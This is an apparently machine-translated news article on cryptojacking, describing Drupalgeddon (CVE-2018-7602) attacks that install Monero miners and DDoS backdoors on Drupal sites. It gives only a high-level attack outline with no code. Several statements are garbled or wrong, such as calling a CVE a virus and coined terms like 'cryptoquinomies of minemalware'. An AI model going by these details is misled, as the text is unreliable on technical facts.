During 2017 and part of this year, the incidents of cryptojacking have caused numerous problems and a large number of complaints and criticisms towards websites that use the computing power of desktop, laptop and mobile devices in some cases, of their visitors in order to mine Monero.
The most notorious case has been the PirateBay site, which has even established a series of policies for the use related to mining in Monero through its website. However, a very peculiar attack is taking place based on the same principle of cryptojacking, and which has been compromising the security of the Drupal e-commerce platform.
The Drupal open source content management system is currently used by millions of users worldwide, highlighting e-commerce and content management companies who base their websites on this system known for its good features for that category of websites.
But this platform has been going through a repeated way a cyber attack which has been called “Drupalgeddon virus”, despite the fact that Drupal Security Labs launched a software patch in March 2018 to fight against the security vulnerability, which has persisted with a renewed strength.
Although it is not the first time since 2000 when Drupal was founded, that this platform is the target of cyber attacks, and what makes the scenario complicated with this new attack is the criminality that surrounds it. The virus has been identified as CVE-2018-7602. This infamous virus delivers illegal cryptoquinomies of minemalware to the victims’ machines.
After infiltrating the computers of the victims and virtually making use of their computing power, the CVE-2018-7602 virus mines the cryptocurrency Monero – XMR-, the favorite cryptocurrency of hackers, with statistics that place it at more than 85 per cent of all cases of cryptojacking and more than $ 175 million in XMR alone in 2018.
These are very alarming figures to leave the authorities unmoved and not provoke a severe discussion on the need for more effective punitive regulations to prevent and punish the cryptographic illicit.
The virus attack process begins with a “shell script” download, followed by an executable and linkable format downloader to add a crontab entry. Security protocols are evaded to install mining malware – minemalware -, taking advantage of Drupal’s failure to “disinfection of # characters in URLs”.
In addition to cryptojacking as such, hackers exploit the vulnerability to control multiple Drupal sites and install Denial of Service (DDoS) malware for long-term software backdoor access, in which an authentic nightmare is configured.
Drupal has produced updated patches to protect its users from these threats, and therefore recommends constantly update to prevent their machines and avoid compromising both the computing capabilities of their PCs, and other possible more complicated situations arising from the cyber attacks. Prevention is a task of all users along with the recommendations and security updates of software service providers.